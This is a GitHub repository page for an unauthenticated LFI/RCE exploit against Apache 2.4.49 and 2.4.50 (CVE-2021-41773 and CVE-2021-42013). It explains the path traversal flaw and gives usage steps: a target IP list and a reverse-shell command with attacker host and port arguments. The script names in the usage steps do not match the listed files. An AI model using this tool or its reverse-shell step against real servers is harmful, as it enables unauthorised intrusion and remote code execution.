Skip to content

sergiovks/LFI-RCE-Unauthenticated-Apache-2.4.49-2.4.50

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits

LICENSE

LICENSE

 
 

README.md

README.md

 
 

exploit.py

exploit.py

 
 

exploit2(notREADYyet).py

exploit2(notREADYyet).py

 
 

ip.txt

ip.txt

 
 

Repository files navigation

LFI-RCE-Unauthenticated-Apache-2.4.49-2.4.50

LFI / RCE Unauthenticated - Apache 2.4.49 & 2.4.50

Explanation:

Apache HTTP Server is an open source web server from the Apache Foundation in the United States. The server is fast, reliable, and extensible via a simple API. It was discovered that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 is insufficient. An attacker could use a path traversal attack to map URLs to files outside of directories configured by alias-like directives. These requests may succeed if the files outside of these directories are not protected by the usual default configuration of "request all rejects". If CGI scripts are also enabled for these alias paths, this may allow remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50, and not earlier versions.

Usage:

Put the IP address you want to check into the ip.txt file
Run python3 check.py

# FOR REVERSE SHELL
python script.py --lhost 192.168.0.100 --lport 1234

Affected software:

Apache 2.4.49

Apache 2.4.50

About

LFI / RCE Unauthenticated - Apache 2.4.49 & 2.4.50

Topics

rce apache2 lfi rce-exploit lfi-exploit cve-2021-41773 cve-2021-42013 cve-2021-41773-poc

Resources

Readme

License

CC0-1.0 license
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages